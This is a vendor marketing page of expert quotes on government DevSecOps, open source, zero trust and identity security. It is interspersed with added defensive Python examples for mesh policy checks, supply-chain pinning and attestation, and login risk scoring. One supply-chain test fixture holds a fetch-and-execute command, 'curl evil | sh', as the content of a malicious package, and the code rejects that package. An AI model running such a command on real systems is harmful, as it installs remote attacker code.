Building a DevSecOps Culture

As software becomes more sophisticated, it plays an increasingly important role in all aspects of government operations. However, given the complexity and intertwined nature of modern software, a single vulnerability in a widely used component can have wide-ranging consequences, which makes security of vital importance. The federal government has taken notice. A number of recent policy directives, including Executive Order 14028 on Improving the Nation’s Cybersecurity and Executive Order 14058 on Transforming Federal Customer Experience and Service Delivery to Rebuild Trust, address the software supply chain, and key agencies are leading a governmentwide effort to promote secure software development. Learn how you can implement DevSecOps to support your journey to secure, innovative software in Carahsoft’s Innovation in Government® report.

The Mindset Shift that Enables DevSecOps

“In an ideal world, technology and processes support team members’ ability to deliver on their particular talents. Before agencies implement DevSecOps methodologies, they should identify where their processes are getting bottlenecked and forcing people to either work around them or fundamentally change their behavior. Instead, we want to make it easy for employees to do the right thing. The goal is to enable people to focus on what they do best — regardless of where they operate in the stack or the tools they are using — so that agencies can build and deploy secure, modern apps.”

Read more insights from Alex Barbato, Public Sector Solutions Engineer at VMware.

How Generative AI Improves Software Security  

“Generative AI tools are becoming increasingly prevalent, providing interactive experiences that captivate the public’s imagination. These tools are accessible to anyone, offering a unique opportunity to engage and explore the creative possibilities enabled by AI technology. The technology doesn’t just train a model to recognize patterns. It can create things that are easy to understand: images, text, even videos. Sometimes the results are hilariously wrong, but other times the results are quite impressive, such as clear, concise answers to complex questions. Generative pre-trained transformer (GPT) technology, such as ChatGPT, has opened the doors for everyone to be an evaluator because the output is accessible and easy to critique.”

Read more insights from Robert Larkin, Senior Solutions Architect at Veracode.

Open Source is at the Heart of Software Innovation

“Embedding security into applications from the start is essential for streamlining and strengthening the entire development life cycle. Securing the software supply chain is a related effort that is of vast importance to government operations. Beyond securing individual applications, the ultimate goal is to build security into the pipeline itself. At each step and every handoff, we must be able to verify who has touched the software and who did what to ensure that the end result is what we intended to build and that nothing malicious has been injected along the way.”

Read more insights from Chris Mays, Staff Specialist Solutions Architect at Red Hat.

DevSecOps Needs Tool Diversity and Collaboration

“As DevSecOps methodologies and software factories grow in prevalence, agencies are recognizing that software development is a team sport — inside the agency, across departments and with external stakeholders. It touches many different teams, but getting everyone on the same page with tooling can be difficult. Different teams prefer different tools, and that makes collaboration hard. Modern software development brings security practices forward in the timeline while reducing duplication of efforts and improving real-time accountability. Success hinges on removing blockers, creating visibility and making sure collaboration is happening at every stage. In addition, encouraging input from different areas of the organization from the beginning and throughout development is vital for innovation.”

Read more insights from Ben Straub, Head of Public Sector at Atlassian.

Observability Speeds Zero Trust and Application Security

“In response to increasing cyberthreats, the government is speeding up the move to zero trust. This security model assumes that every user, request, application and non-human entity is not to be trusted until its identity can be verified. Zero trust principles require a layered defense that is more effective when rooted in observability. To develop an architecture that validates and revalidates every entity on the network, it is necessary to know what those entities are, how they’re communicating and how they typically behave so we can recognize deviations. Zero trust and observability technologies work together to create a more secure and resilient network environment by assuming that all requests for access are untrusted and continuously monitoring the network to detect and respond to potential threats.”

Read more insights from Willie Hicks, Public Sector Chief Technologist at Dynatrace.

The Role of a Service Mesh in Zero Trust Success

“For large companies and government agencies, it’s safe to assume that a committed attacker is already inside their networks. Executive Order 14028 mandates that every federal agency develop a Zero Trust architecture because it is the most effective approach to mitigating what attackers can do once they’ve made their way inside. What does Zero Trust look like at runtime? One of the key considerations is identity-based segmentation, which involves conducting five policy checks for every request in the system: encrypted connection between service endpoints, service authentication, service-to-service authorization, end user authentication, and end user-to-resource authorization.”

Read more insights from Zack Butcher, Founding Engineer at Tetrate and co-author of the NIST SP 800-204 series and SP 800-207A.

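The five per-request checks Butcher lists map directly onto a policy-evaluation routine. The following Python is an added illustration, not Tetrate’s, Istio’s or NIST’s code: it models the decision a mesh proxy makes for each request, ordered fail-closed so that a request which passes the service-level checks but carries no end-user credential is still denied. The SPIFFE-style workload identities, the policy tables and the request records are assumptions constructed for the example.

```python
"""Per-request identity-based segmentation, as NIST SP 800-207A describes it.

Added illustration, not Tetrate's, Istio's or NIST's code. It models the five
checks a mesh proxy would apply to every request: mTLS, service authentication,
service-to-service authorization, end-user authentication and end-user-to-resource
authorization. The SPIFFE-style identities, policy tables and request records are
constructed for the example.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Request:
    mtls_verified: bool      # peer certificate chain validated during the TLS handshake
    peer_id: Optional[str]   # workload identity from the peer cert SAN (None if absent)
    user: Optional[str]      # end-user subject from a validated token (None if absent/invalid)
    method: str
    resource: str


# Hypothetical policy tables; a mesh would push these from its control plane.
FRONTEND = "spiffe://agency.example/ns/web/sa/frontend"
RECORDS = "spiffe://agency.example/ns/api/sa/records"

SERVICE_POLICY = {
    # (caller workload, callee workload) -> methods the caller may invoke
    (FRONTEND, RECORDS): {"GET", "POST"},
}
USER_POLICY = {
    # end user -> resource -> methods
    "alice@agency.example": {"/records/123": {"GET"}},
}


def evaluate(req: Request, callee: str) -> Tuple[bool, List[str]]:
    """Apply the five checks in order and fail closed at the first one that does not hold.

    Returns (allowed, trail); the trail records which checks passed and why the
    request was denied, which is what an audit log for the decision should carry.
    """
    trail: List[str] = []

    # 1. Encrypted connection between service endpoints: mutual TLS must be in place.
    if not req.mtls_verified:
        return False, trail + ["deny: connection is not mTLS-verified"]
    trail.append("mtls verified")

    # 2. Service authentication: the caller presented a workload identity we could validate.
    if not req.peer_id:
        return False, trail + ["deny: no authenticated caller workload"]
    trail.append(f"caller is {req.peer_id}")

    # 3. Service-to-service authorization: may this caller invoke this callee with this method?
    if req.method not in SERVICE_POLICY.get((req.peer_id, callee), set()):
        return False, trail + [f"deny: {req.peer_id} may not {req.method} {callee}"]
    trail.append("service-to-service authorized")

    # 4. End-user authentication: a validated end-user credential accompanied the request.
    if not req.user:
        return False, trail + ["deny: no authenticated end user"]
    trail.append(f"user is {req.user}")

    # 5. End-user-to-resource authorization.
    if req.method not in USER_POLICY.get(req.user, {}).get(req.resource, set()):
        return False, trail + [f"deny: {req.user} may not {req.method} {req.resource}"]
    trail.append("user-to-resource authorized")

    return True, trail


if __name__ == "__main__":
    ok = Request(True, FRONTEND, "alice@agency.example", "GET", "/records/123")
    print(evaluate(ok, RECORDS))
    # A trusted workload forwarding a request with no user token is stopped at check 4,
    # even though the two services are allowed to talk to each other.
    no_user = Request(True, FRONTEND, None, "GET", "/records/123")
    print(evaluate(no_user, RECORDS))
```

Two details matter in practice: the checks are ordered so that the most fundamental failures (no mTLS, no workload identity) end evaluation early, and the trail returned with each decision is what the proxy should emit to the audit log, since a zero trust architecture depends on being able to reconstruct why a request was allowed.
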
AI and the Journey to Secure Software Development

“By automating and optimizing DevSecOps workflows, we can still shift security left while relieving developers from the burden of some complex remediation. It begins with a workflow that leverages fully automated security scanning to rapidly identify vulnerabilities as well as providing suggested remediation for vulnerabilities and on-demand remediation training to educate developers on what they are getting into. The rapid evolution of artificial intelligence is making new advances possible. The opportunities go well beyond AI-assisted code creation. AI features are being expanded across the entire software development life cycle. When it comes to security, having AI assist by making code functionality clear or explaining a vulnerability in detail reduces the time required to remediate risk.”

Read more insights from Joel Krooswyk, Federal CTO at GitLab.

Scaling App Development While Meeting Security Standards

“The dream for any software development team is constant, stable releases. The faster teams get the work they’ve created into production, the faster the agency can derive value from that work. When app development is stymied by cumbersome security reviews and stability testing and by the need to wait for a deployment window, innovation is stifled and the return on investment is delayed. If agencies want to have efficient, value-driving software development teams, those teams must be able to move with agility. A trustworthy, scalable DevOps pipeline that brings together testing and security in a seamless way allows teams to push out new apps and improvements quickly so government employees and citizens can have a seamless digital experience and the most up-to-date tools and information.”

Read more insights from Kyle Tobener, Head of Security and IT at Copado.

Join us in person for our must-attend DevSecOps Conference—an exciting day of exhibits, speaking sessions, and networking events. We look forward to showcasing new DevSecOps updates from our supporting panels featuring government, systems integrators, and industry thought leaders.

Download the full Innovation in Government® report for more insights from DevSecOps thought leaders and additional industry research from FCW.

The Open Source Revolution in Government

Open source technology accounts for a significant portion of most modern applications, with some estimates going as high as 90%, and it is the foundation of many mainstream technologies. Its strength lies in a vibrant ecosystem of developers who contribute to and continually improve the underlying code, which keeps the software responsive to changing needs. Enterprise open source software augments these community-driven projects with enterprise-grade support and scalability while retaining the innovation and flexibility of the open source development model. By providing the best of both worlds, such solutions give agencies a powerful set of tools for addressing government’s most pressing challenges.

In a recent pulse survey of FCW readers, 93% of respondents said they were using open source technology, and more than half see open source as an integral resource for strengthening cybersecurity. That reflects a better understanding of how open source software approaches security: because the code is open to inspection, vulnerabilities can be found and fixed by anyone in the community rather than only by a single vendor, a benefit that depends on the components actually being reviewed and kept current. The power of enterprise open source technologies lies in the combination of collaboration, transparency and industry expertise. As agencies expand their use of such technologies, they maximize their ability to achieve mission success in the most secure, agile and innovative way possible.

Learn how the combined power of community-driven innovation and industry-leading technical support is expanding the government’s capacity for transformation in Carahsoft’s Innovation in Government® report.

Why Open Source is a Mission-Critical Foundation  

“Open source transforms the way agencies manage hybrid and multi-cloud environments. The most critical technology in the cloud, across all providers, is Linux. Everything is built on top of that foundation — both the infrastructure of the cloud and cloud offerings. Given the right partner, the promise of Linux is that it provides a consistent technology layer for agencies across all footprints, including multiple cloud providers, on-premises data centers and edge environments. From that foundation, agencies and their partners can build portable architectures that leverage other open source technologies. Portability gives organizations the ability to use the same architectures, underlying technologies, monitoring and security solutions, and human skills to manage mission-critical capabilities across all footprints.”

Read more insights from Christopher Smith, Vice President and General Manager of the North America Public Sector at Red Hat.

How Open Source is Expanding its Mission Reach

“The real power of open source technologies was revealed when they cracked the code on being highly powered, mission-specific, distributed systems. That’s how we are able to get insights out of data by being able to hold it and query it. Today, open source innovation is being accelerated by the cloud, and the conversation is still changing, with people now demanding that their open source companies be cloud-first platforms. Along the way, the open source technologies that start in the community and then receive a boost of commercial innovation have matured. The most powerful ones are expanding their ability to address more of the government’s mission needs. They are staying interoperable and keeping the data interchange non-proprietary, which is important for government agencies.”

Read more insights from David Erickson, Senior Director of Solutions Architecture at Elastic.

The Open Source Community’s Commitment to Security  

“A central tenet of software development is visibility and traceability from start to finish so that a developer can follow the code through development, testing, building and security compliance, and then into the final production environment. Along the way, there are some key activities that boost collaboration and positive outcomes, starting with early code previews, where developers can spin up an application for stakeholders to review. Other activities include documented code reviews by peers to ensure the code is well written and efficient. In addition, DevOps components such as open source, infrastructure as code, Kubernetes as a deployment mechanism, automated testing, and better platforms and capabilities have helped developers move away from building ecosystems and instead focus on innovation.”

Read more insights from Joel Krooswyk, Federal CTO at GitLab.

The Limitless Potential of an Open Source Database

“One of the most important elements of any database migration is ensuring that proper planning and due diligence have been performed to ensure a smooth and successful deployment. In addition, there are some key considerations agencies should keep in mind when moving to open source databases. It is essential to start with a clear understanding of the business case and objectives for adopting an open source approach. Agencies also need to decide how the database should function and what it should do to support their digital transformation. Then they must choose the optimal method to deploy the database.”

Read more insights from Jeremy A. Wilson, CTO of the North America Public Sector at EDB.

Modernizing Digital Services with Open Source

“A composable, open source digital experience platform (DXP) enables agencies to overcome those challenges. Open source technology is continuously contributed to by a community of developers to reflect a wide array of needs across organizations in varying industries and of varying sizes. A composable approach allows agencies to assemble a number of solutions for a fast, efficient system that is tailored to their needs. When agencies combine a composable DXP with open source technology, they have access to best-of-breed software and the ability to customize the assembly to suit their requirements. An enterprise DXP will enable agencies to achieve a 360-degree view of how constituents are engaging with their digital services and gain valuable data to understand how to enhance their experience. Finally, a composable, open source DXP provides a proactive approach to protecting against security and compliance vulnerabilities.”

Read more insights from Tami Pearlstein, Senior Product Marketing Manager at Acquia.

Creating Secure Open Source Repositories

“Protecting the software supply chain requires looking at every single thing that might come into an agency’s environment. To understand that level of visibility, I like to use the analogy of a refrigerator. All the ingredients necessary to make a cake or pie are in the refrigerator. We know they are of good quality, and other teams can use them instead of having to find their own. At Sonatype, our software equivalent of a refrigerator is the Nexus Repository Manager. A second aspect of our offering, called Lifecycle, allows us to evaluate the open source components in repositories at every stage of the software development life cycle. One piece of software can download a thousand other components. How do we know if one of those components is malicious?”

Read more insights from Maury Cupitt, Regional Vice President of Sales Engineering at Sonatype.

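Both the Red Hat passage earlier on the page about verifying who touched the software at each handoff and Cupitt’s question of how to know whether one of a thousand pulled components is malicious come down to the same two mechanical checks. The Python below is an added example, not Red Hat’s, Sonatype’s or Nexus Repository Manager’s code: it rejects any component whose digest does not match a pin from the curated repository, and it verifies a chain of per-step attestations in which each actor signs over the artifact digest and the previous record. HMAC under per-actor keys stands in for the asymmetric signatures (Sigstore, in-toto) a real pipeline would use; the component contents, keys, step names and records are assumptions constructed for the example.

```python
"""Verifying a build's inputs and its chain of handoffs (added example).

Not Red Hat's or Sonatype's code. Two checks are modelled: (a) every component
the build pulls in must match a digest the curated repository pinned, and
(b) every pipeline step must have been attested by the expected actor, over the
same artifact, and linked to the step before it. Attestations are signed with
HMAC under per-actor keys as a stand-in for the asymmetric signatures a real
pipeline would use (Sigstore, in-toto); digests, keys and records are constructed.
"""
import hashlib
import hmac
import json
from typing import Dict, List, Optional, Tuple


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# (a) Component pins the repository manager vouches for (constructed contents).
PINNED: Dict[str, str] = {
    "left-pad-1.3.0.tgz": sha256(b"left-pad 1.3.0 contents"),
    "requests-2.31.0.whl": sha256(b"requests 2.31.0 contents"),
}


def check_components(downloaded: Dict[str, bytes]) -> List[str]:
    """Names of components that are unpinned or whose digest disagrees with the pin."""
    rejected = []
    for name, content in downloaded.items():
        expected = PINNED.get(name)
        # An unknown component is rejected outright: nothing reaches the build
        # unless the curated repository vouched for it.
        if expected is None or not hmac.compare_digest(expected, sha256(content)):
            rejected.append(name)
    return rejected


# (b) Handoff attestations. Each actor signs with its own key; each record carries
# the digest of the previous record so steps cannot be dropped or reordered.
ACTOR_KEYS: Dict[str, bytes] = {"ci-builder": b"key-1", "test-runner": b"key-2", "scanner": b"key-3"}
EXPECTED_STEPS = ["ci-builder", "test-runner", "scanner"]


def _canonical(payload: dict) -> bytes:
    return json.dumps(payload, sort_keys=True, separators=(",", ":")).encode()


def attest(actor: str, payload: dict) -> dict:
    sig = hmac.new(ACTOR_KEYS[actor], _canonical(payload), "sha256").hexdigest()
    return {"actor": actor, "payload": payload, "sig": sig}


def build_chain(artifact: bytes) -> List[dict]:
    """What a well-behaved pipeline emits: one linked attestation per step."""
    records, prev = [], None
    for actor in EXPECTED_STEPS:
        payload = {"step": actor, "artifact": sha256(artifact), "prev": prev}
        records.append(attest(actor, payload))
        prev = sha256(_canonical(payload))
    return records


def verify_chain(records: List[dict], artifact: bytes) -> Tuple[bool, str]:
    """Accept the artifact only if every expected step attested it, in order, under a valid signature."""
    if [r["actor"] for r in records] != EXPECTED_STEPS:
        return False, "step sequence does not match the expected pipeline"
    prev: Optional[str] = None
    for r in records:
        body = _canonical(r["payload"])
        expected_sig = hmac.new(ACTOR_KEYS[r["actor"]], body, "sha256").hexdigest()
        if not hmac.compare_digest(expected_sig, r["sig"]):
            return False, f"signature from {r['actor']} does not verify"
        if r["payload"]["artifact"] != sha256(artifact):
            return False, f"{r['actor']} attested a different artifact"
        if r["payload"]["prev"] != prev:
            return False, f"{r['actor']} record is not linked to the previous step"
        prev = sha256(body)
    return True, "chain verified"


if __name__ == "__main__":
    artifact = b"app-1.0.0 release bundle"
    print(verify_chain(build_chain(artifact), artifact))
    pulled = {"left-pad-1.3.0.tgz": b"left-pad 1.3.0 contents", "typo-squat-0.1.tgz": b"curl evil | sh"}
    print(check_components(pulled))  # the unpinned package is rejected
```

Note what the chain check catches beyond a bad signature: a dropped step, a record that attests a different artifact than the one being deployed, and a record re-signed by a legitimate actor but not linked to its predecessor. Pinning by digest rather than by version name is what closes the gap Cupitt points at, since a malicious or typo-squatted package has no pin and is rejected before the build ever sees it.
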
Better Data Flows for a Better Customer Experience

“A more responsive and personalized customer experience isn’t much different from the initial problem set that gave birth to Apache Kafka. When people interact with agencies, they want those agencies to know who they are and how they’ve interacted in the past. They don’t want to be asked for their Social Security number three times on the same phone call. They also expect that the information or service they receive will be the same whether they are accessing it over the phone, via a mobile app and on a website. To elevate the quality of their service, agencies must be able to stream information in a low-friction way so different systems are consistent with one another and up-to-date at all times, regardless of the communication channel an individual uses. President Joe Biden’s executive order about transforming the federal customer experience is based on this capability. The most successful companies across industries have figured out how to do it, and for the most part, they’ve done it with open source software.”

Read more insights from Jason Schick, General Manager of Confluent US Public Sector.

An Open Source Approach to Data Analytics

“For the past 40 years, agencies have used data warehouses to collect and analyze their data. Although those warehouses worked well, they were limited in what they could do. For instance, they could only handle structured data, but by some estimates, 90% of agencies’ data is unstructured and in the form of text, images, audio, video and the like. Furthermore, proprietary data warehouses can show agencies what has happened in the past but can’t predict what might happen in the future. To achieve the government’s goal of evidence-based decision-making, agencies need to be able to tap into all their data and predict what might come next.”

Read more insights from Howard Levenson, Regional Vice President at Databricks.

Download the full Innovation in Government® report for more insights from these open source thought leaders and additional industry research from FCW.

Conversations With CXOs: Crash Course on the Future of Government

For government employees looking to build successful and satisfying careers in public service, the curriculum is changing. It’s not enough to develop mastery of agency processes and policies or to stockpile continuing education credits on traditional core competencies. Instead, public servants need to develop a working knowledge of current trends in IT and management that are reshaping how government operates. IT and management: That’s the operative phrase. Technology is continually improving the efficiency of work processes and the productivity of employees. But efficiency and productivity only go so far. It’s at the intersection of technology and management that real change is happening. Agencies are gaining new insights into their operations and services, and using those insights to fuel innovations across their organizations. Government employees at all levels have the opportunity to be part of this transformation, but they need to get up to speed on the key trends. Where are they to begin? Download the guide to read more about four competencies that could be critical to the careers of public servants.

Edge Computing Raises Ransomware Risk

“The problem is that edge computing – in which data is being aggregated, accessed or processed outside the network perimeter – is leaving data exposed to cyber criminals who see an opportunity to make money through ransomware schemes. According to Gartner, a research and consulting firm, edge computing will grow 75% by 2025. In government, the surge is being fueled both by a growth in end-user devices in mobile and remote computing and in non-traditional devices associated with the Internet of Things (IoT) and operational technology (OT), such as sensors and cameras. In many cases, agencies support edge computing by moving data into the cloud, rather than requiring end-users or devices to go through the data center. This hybrid cloud environment mitigates performance and latency problems but also makes the network perimeter even more porous.”

Read more insights from HPE’s Distinguished Technologist for Cyber Security, James M.T. Morrison.

Agencies Need to Maintain a Sense of Cyber Urgency

“Security isn’t just the responsibility of individuals. Agencies also must ensure they treat security as a top priority. SolarWinds recommends two areas of focus:

Prioritize the development of cyber experts. Given the high demand for cyber experts, agencies should focus more energy on developing talent in house. Shopp said one approach is to convert IT professionals, who are already tech savvy, into cyber professionals.

Prioritize collaboration between tech pros and leaders. Policies and strategies aimed at reducing risk should reflect both technical and organizational expertise and requirements. Shopp said agencies also should collaborate more with trusted industry partners. SolarWinds, for example, isn’t just a technology vendor; it also has a large development shop, as many government agencies do, and can exchange ideas about cyber strategies, tools, and best practices.”

Read more insights from SolarWinds’ Group Vice President of Product Management, Brandon Shopp.

How to Move DevOps from Disarray to Unity

“An agency’s initial forays into integrating their development and operations teams can bear fruit quickly, leading to better quality software produced at a faster clip. The risk is that an organization will treat its initial forays as the endgame, not realizing that a more mature approach, with greater payoffs, is possible. In short, the DevOps initiatives never grow up. GitLab, which has years of experience helping organizations with DevOps adoption, has identified four stages in a DevOps journey, culminating in an approach that delivers even greater benefits than envisioned at the outset.”

Read more insights from GitLab’s Federal Solutions Architect, Sameer Kamani, and Senior Public Sector Solutions Architect, Daniel Marquard.

Why Stronger Security Hinges on Identity Data

“To understand the need for an Intelligent Identity Data Platform, consider two scenarios. In the first case, a user logs into an application from her office at 2 p.m. each day. In this case, she will be considered a low risk, based on three factors: Her credentials, her usage patterns and location data. In the second scenario, this same user logs into the application from her office but at 2 a.m. The aberration in her routine (i.e., usage pattern) raises a red flag, as would a change in her location. Even this simple use case requires an agency to have a holistic picture of an end-user, which is not possible without a central platform.”

Read more insights from Radiant Logic’s Vice President of Solutions Architects and Senior Technical Evangelist, Wade Ellery.

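The two scenarios Ellery describes, and the Dynatrace point earlier on the page about knowing how entities typically behave so that deviations stand out, both reduce to scoring a new event against a baseline built from the entity’s own history. The Python below is an added example, not Radiant Logic’s or Dynatrace’s code: it builds a per-user profile of login hours and locations from past successful logins and scores a candidate login on the three factors the passage names (credentials, usage pattern, location). The login history, the tolerance window and the score thresholds are assumptions chosen for the example.

```python
"""Scoring a login against the user's own baseline (added example, not Radiant Logic's code).

Combines the three factors the passage names: credential validity, usage pattern
(hour of day) and location. The login history and the candidate events are
constructed; a real deployment would draw them from the identity platform's
consolidated view of the user. Tolerance and thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Set, Tuple

# Constructed history of successful logins: (user, ISO-8601 timestamp, location).
HISTORY = [
    ("jdoe", "2023-05-01T14:02:00", "hq-office"),
    ("jdoe", "2023-05-02T14:05:00", "hq-office"),
    ("jdoe", "2023-05-03T13:58:00", "hq-office"),
    ("jdoe", "2023-05-04T14:10:00", "hq-office"),
    ("jdoe", "2023-05-05T14:01:00", "hq-office"),
]

HOUR_TOLERANCE = 2  # hours either side of an observed login hour still count as routine


def build_baseline(history) -> Dict[str, Dict[str, Set]]:
    """Per user: the hours of day and the locations seen in past successful logins."""
    baseline: Dict[str, Dict[str, Set]] = defaultdict(lambda: {"hours": set(), "places": set()})
    for user, ts, place in history:
        baseline[user]["hours"].add(datetime.fromisoformat(ts).hour)
        baseline[user]["places"].add(place)
    return baseline


def _hour_distance(a: int, b: int) -> int:
    d = abs(a - b) % 24
    return min(d, 24 - d)  # wrap around midnight, so 23:00 and 01:00 are 2 apart


def score_login(baseline, user: str, ts: str, place: str,
                credentials_valid: bool) -> Tuple[int, List[str], str]:
    """Return (score, reasons, action). Routine logins score 0; each deviating factor adds weight."""
    if not credentials_valid:
        return 100, ["credentials did not validate"], "deny"
    profile = baseline.get(user)  # .get() does not create a default entry
    if profile is None:
        # No history to compare against: treat as unknown rather than routine.
        return 60, ["no baseline for user"], "step-up"
    score, reasons = 0, []
    hour = datetime.fromisoformat(ts).hour
    if all(_hour_distance(hour, h) > HOUR_TOLERANCE for h in profile["hours"]):
        score += 40
        reasons.append(f"login at {hour:02d}:00 is outside the user's usual hours")
    if place not in profile["places"]:
        score += 40
        reasons.append(f"location {place!r} not seen before for this user")
    action = "allow" if score < 40 else ("step-up" if score < 80 else "deny")
    return score, reasons, action


if __name__ == "__main__":
    base = build_baseline(HISTORY)
    print(score_login(base, "jdoe", "2023-05-08T14:03:00", "hq-office", True))     # routine
    print(score_login(base, "jdoe", "2023-05-08T02:03:00", "hq-office", True))     # 2 a.m.: step-up
    print(score_login(base, "jdoe", "2023-05-08T02:03:00", "unknown-city", True))  # both deviate: deny
```

With this history the routine 2 p.m. office login scores 0, the 2 a.m. login from the same office scores 40 and triggers step-up authentication, and the 2 a.m. login from a new location scores 80 and is denied. A user with no history is treated as unknown rather than routine, which is the failure mode a baseline-only design otherwise gets wrong.
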
The Case for Data Literacy

“Someone who works in national defense requires different data skills from those in environmental or financial management auditing. ‘We firmly believe it’s not a one-size-fits-all approach,’ Ariga said. Training must be catered to tradecraft. It’s the reason GAO is creating its own data literacy curriculum specific to the oversight community, instead of relying on third-party training that focuses on generic, often commercial aims. Additionally, the best time for people to learn data skills is when they actually need them. On-demand tools such as microlearning videos and a walk-in Genius Bar ensure staff can access data solutions and build literacy when they need, instead of waiting months to register for a class.”

Read more insights from the Government Accountability Office’s Chief Data Scientist and Director of the Innovation Lab, Taka Ariga.

The Future of AI Hangs on Ethics, Trust

“Over the next five years or so, we could see a revolution in the use of AI, Sivagnanam said. Think about the self-driving car industry. At this point, human drivers are still a necessary part of the equation. But AI pioneers are hard at work trying to change that, and quickly. Similar advances are likely in other applications of AI. Over the next three to five years, Sivagnanam hopes to see the AI industry mature. As part of that, he expects to see the development of regulations and guidelines around AI and ethics, both from the federal government and from industry organizations. That work is already getting underway, and NSF is playing a role. Through a grants program called Fairness in Artificial Intelligence (FAI), NSF supports researchers working on ethical challenges in AI.”

Read more insights from the U.S. National Science Foundation’s Chief Architect, Chezian Sivagnanam.

Q&A: Getting Schooled on Zero Trust Security

“Zero trust means zero trust. We’re monitoring your internal systems. To an extent, we are monitoring what individuals are doing. That’s not to say we’re Big Brother. We’re not monitoring the keystrokes of every user in the state or anything like that. For the agencies, multi-factor [authentication] is a huge one. We’ve seen time and time again accounts get compromised because they had a bad username and password. If that’s the only thing protecting a system, that’s not enough. The bottom line is we know people create bad passwords. That’s a given. You can increase awareness about how to create good passwords, and you certainly want to try that. In many cases, people will just figure out ways around complexity requirements to get an easy-to-remember password versus a secure and strong password. You want to encourage people to have unique passwords for every single site. At some point, you need to give them a secure method of being able to remember all these passwords.”

Read more insights from Connecticut’s CISO, Jeff Brown.

3 Tenets for Advancing Equity in Your Everyday Work

“If there were one thing you could do to eliminate health disparities or advance health equity, what would it be? This is a question that Dr. Leandris Liburd gets asked often, but it’s not one she’s fond of. The answer isn’t a simple one, and the COVID-19 pandemic has magnified that truth. There isn’t a magic pill to ensure that no one is denied the possibility of being healthy because they belong to a group that has been economically or socially disadvantaged. And measuring success is about more than data points. Choosing one thing to advance health equity ‘is not possible when you’re dealing with these kinds of complexities,’ Liburd said in an interview with GovLoop. ‘So we have to do a lot of things at the same time.’”

Read more insights from the CDC’s Director of the Office of Minority Health and Health Equity, Dr. Leandris Liburd.

Download the full GovLoop Guide for more insights from chief information officers, a chief data scientist and other senior leaders in federal, state and local government.